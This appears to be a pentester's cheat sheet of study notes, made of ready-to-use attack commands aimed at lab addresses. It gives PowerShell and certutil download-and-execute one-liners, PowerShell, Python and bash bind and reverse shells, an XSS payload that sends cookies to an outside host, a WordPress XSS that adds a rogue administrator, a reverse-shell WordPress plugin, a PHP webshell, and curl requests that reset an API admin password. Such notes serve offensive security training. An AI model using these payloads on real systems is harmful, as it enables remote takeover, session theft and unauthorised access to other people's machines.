# Note Day1,2 ## windows download file ``` certutil.exe -urlcache -f http://10.7.30.1/test.txt test.txt ``` ``` powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.7.30.1/wget.exe','C:\Users\offsec\Desktop\wget.exe')" ``` 遠端下載執行，檔案不落地 ``` IEX (New-Object System.Net.Webclient).DownloadString('http://10.7.30.1:8081/powercat.ps1'); ``` bindshell ``` powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()" ``` reverseshell ``` powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.7.30.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close()" ``` mkpsrevshell.py ``` https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py ``` ``` powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://10.7.30.1:8081/powercat.ps1');powercat -c 10.7.30.1 -p 4444 -e powershell" ``` ## Linux python bind shell ``` python3 -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",4444));s1.listen(1);c,a=s1.accept(); while True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' ``` bash reverse shell ``` /bin/bash -c 'bash -i >& /dev/tcp/10.7.30.1/4444 0>&1' ``` TTY shell ``` $ python -c 'import pty;pty.spawn("/bin/bash")' $ python3 -c 'import pty;pty.spawn("/bin/bash")' $ script -qc /bin/bash /dev/null ``` php reverse shell ``` https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php ``` XSS ``` email=<script>new Image().src="http://10.7.30.1/cool.jpg?output="%2bdocument.cookie;</script> ``` wordpress xss ``` var ajaxRequest = new XMLHttpRequest(); var requestURL = "/wp-admin/user-new.php"; var nonceRegex = /ser" value="([^"]*?)"/g; ajaxRequest.open("GET", requestURL, false); ajaxRequest.send(); var nonceMatch = nonceRegex.exec(ajaxRequest.responseText); var nonce = nonceMatch[1]; var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=attacker&email=attacker@offsec.com&pass1=attackerpass&pass2=attackerpass&role=administrator"; ajaxRequest = new XMLHttpRequest(); ajaxRequest.open("POST", requestURL, true); ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); ajaxRequest.send(params);   ``` encode xss ``` function encode_to_javascript(string) { var input = string var output = ''; for(pos = 0; pos < input.length; pos++) { output += input.charCodeAt(pos); if(pos != (input.length - 1)) { output += ","; } } return output; } let encoded = encode_to_javascript('insert_minified_javascript') console.log(encoded) ``` wordpress plugin https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell ``` <?php /** * Plugin Name: Reverse Shell Plugin * Plugin URI: * Description: Reverse Shell Plugin * Version: 1.0 * Author: Vince Matteo * Author URI: http://www.sevenlayers.com */ exec("windows/linux command"); ?> ``` php webshell ```php= <?php echo system($_GET['cmd']); ?> ``` ``` curl -X PUT -i http://10.7.30.27:3002/users/v1/admin/password –H "Content-Type: application/json" –d "{\"password\":\"123\"}" ``` ``` curl -X POST -i http://10.7.30.27:3002/users/v1/register -H "Content-Type: application/json" -d "{\"username\":\"test\",\"password\": \"password\", \"email\":\"test@mail.com\"}" ``` ``` curl -X POST -i http://10.7.30.27:3002/users/v1/login -H "Content-Type: application/json" -d "{\"username\":\"test\",\"password\": \"password\"}" ```